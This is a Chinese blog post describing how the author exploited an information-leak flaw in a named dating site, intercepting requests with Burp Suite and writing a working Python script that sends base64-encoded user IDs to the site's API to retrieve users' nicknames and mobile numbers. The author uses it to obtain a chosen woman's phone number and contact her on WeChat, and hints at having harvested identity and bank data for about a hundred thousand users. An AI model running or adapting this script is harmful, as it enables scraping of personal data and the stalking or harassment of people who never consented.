Python脚本抓取信息泄露,获取心怡妹子手机号并添加微信!
答应了蛋蛋的文章一直没空写,主要也没好的素材,平时有些有趣的挖洞经历又总是懒得各种记录截图啥的
学习python中有不明白推荐加入交流群
号:516107834
群里有志同道合的小伙伴,互帮互助,
群里有不错的学习教程!
今天本来想写篇技术专题,后来写着写着发现时间不够了,
以后再继续吧,临时改了这篇,离下班就剩20分钟,很匆忙,表格们将就将就...
0x00 :
首先是这么一个网站: 高颜值社交圈
进去之后是上图这样的,里面号称高颜值交友社区,所有人只能传素颜和未经修图的图片视频进行人工审核,
反正一句话就是:妹子多多
0x01:
具体你们自己去分析,我就直奔主题了,burpsuite抓包:
从万千请求中发现上图这个包,返回信息里竟然带了个人信息
学习python中有不明白推荐加入交流群
号:516107834
群里有志同道合的小伙伴,互帮互助,
群里有不错的学习教程!
(注:其实我原始测试的时候,这里是会返回用户实名认证包括身份证、提现银行卡、姓名等信息的,提交后已修复,
但对方不认为手机号泄露有威胁故还存在)
上图数据包请求的数据参数看上去像base64加密的,我们解码试试:
很好,其实就是一个对方用户的userid,这里有两个思路,循环遍历id去提取所有用户的身份信息(用户大概十多万,你们猜修复前我有没有~~嘿嘿嘿)
当然没有,onls出了名的正义,那么我只想获取单一某个心怡妹子的手机号加微信,python写了个简单脚本如下:
#coding:utf-8
#!/usr/bin/python
import urllib
import base64
import urllib2
from urllib2 import urlerror
import json
def getother():
id_ = raw_input("enter otherid: ")
postdata = '{"data":{"userid":"%s"}}' % id_
bytesstring = postdata.encode("utf-8")
encodestr = base64.b64encode(bytesstring)
decodestr = encodestr.decode()
url='http://www.yanzhi.top/user/v1/otheruser.do'
data = urllib.urlencode({'data': decodestr}) #这个是请求的时候带的post参数,此处应该是json格式
try:
request = urllib2.request(url)
opener = urllib2.build_opener(urllib2.httpcookieprocessor())
response = opener.open(request, data)
result = json.loads(response.read())
userinfo=result[u'userinfo']
userbase = result[u'userbase']
spreadid = userinfo[u'spreadid']
nickname = userbase[u'nickname']
numberid = userbase[u'numberid']
usermobile = userbase[u'usermobile']
print 'nickname:%s,usermobile:%s,numberid:%s,spreadid:%s,numberid:%s ' % (nickname,usermobile,numberid,spreadid,numberid)
except urlerror, e:
if hasattr(e,'reason'): #stands for urlerror
print "can not reach server,writing..."
pass
elif hasattr(e,'code'): #stands for httperror
print "find http error, writing..."
pass
else: #stands for unknown error
print "unknown error, writing..."
pass
getother()
0x02:
这里我觉得这个妹子不错,我在她主页找到她的id,然后执行脚本:
微信搜索手机号:
后面你们自己想象吧,老弟我赶时间呢..
后记:我这是已经提交漏洞,他们修复之后的结果,故对站点无码。
至于之前的信息..
emmmmmm...
上一篇: 媳妇和小姨子下棋
下一篇: Python全栈学习_day006作业